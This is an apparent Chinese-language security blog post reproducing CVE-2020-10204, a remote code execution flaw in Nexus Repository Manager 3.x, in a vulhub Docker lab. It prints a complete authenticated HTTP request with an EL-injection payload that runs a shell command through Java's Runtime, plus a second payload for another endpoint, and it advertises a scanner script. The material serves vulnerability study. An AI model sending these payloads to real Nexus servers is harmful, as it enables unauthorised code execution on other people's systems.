[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现

  • A+
所属分类:安全文章

首先呢,在这祝各位师傅们中秋&国庆快乐!今天对于我而言也是比较有意义的一天,始于10.1,但并不会止于10.1,希望大家都能不忘初心,加油吧!文末有彩蛋...


一、环境搭建:

进入镜像目录:

cd vulhub/nexus/CVE-2020-10204

启动环境:

docker-compose up -d

访问8081端口

[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现




二、漏洞描述:

Sonatype Security Team官方发布了一则关于Nexus Repository Manager 3.x产品的远程代码执行漏洞通告。攻击者在通过身份认证的情况下,可通过EL表达式注入造成远程代码执行漏洞点在 org.sonatype.nexus.common.template.EscapeHelper#stripJavaEl 被绕过,需管理员权限


影响范围:Nexus Repository Manager OSS/Pro 3.x <= 3.21.1


三、漏洞复现:

1、登陆后台:admin / admin

[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现



2、登陆后,构造post请求(注意:NX-ANTI-CSRF-TOKEN头要加上):

POST /service/extdirect HTTP/1.1Host: 192.168.136.131:8081User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1NX-ANTI-CSRF-TOKEN: 0.09964664409272361Cookie: NX-ANTI-CSRF-TOKEN=0.09964664409272361; NXSESSIONID=af669d6c-9231-4be8-b83c-b89471ef65c9Connection: closeContent-Type: application/jsonContent-Length: 289
{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"22212","description":"3333","privileges":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"],"roles":[]}],"type":"rpc","tid":89}

发送请求:

[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现



还可以利用另一个接口coreui_User

{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"[email protected]","status":"active","roles":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}

创建成功:

[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现


[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现




彩蛋:一键漏洞检测脚本(自写)

python3 NexusRCE_Scan.py http://192.168.136.140:8081

支持一键检测:CVE-2019-7238、CVE-2020-10199、CVE-2020-10204:


1、脚本运行效果:

[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现

payload使用随机字符串,减少重复和误报率


2、conf.py配置文件,需进行实际的修改:

[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现

后台留言:NexusRCE_Scan 即可获取脚本


各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935

备注:公众号+师傅们的id吧

[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现

点个赞和在看吧,欢迎转发!

如果脚本有错误,或者bug,欢迎在下方读者讨论、或者私聊我进行交流更正!


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: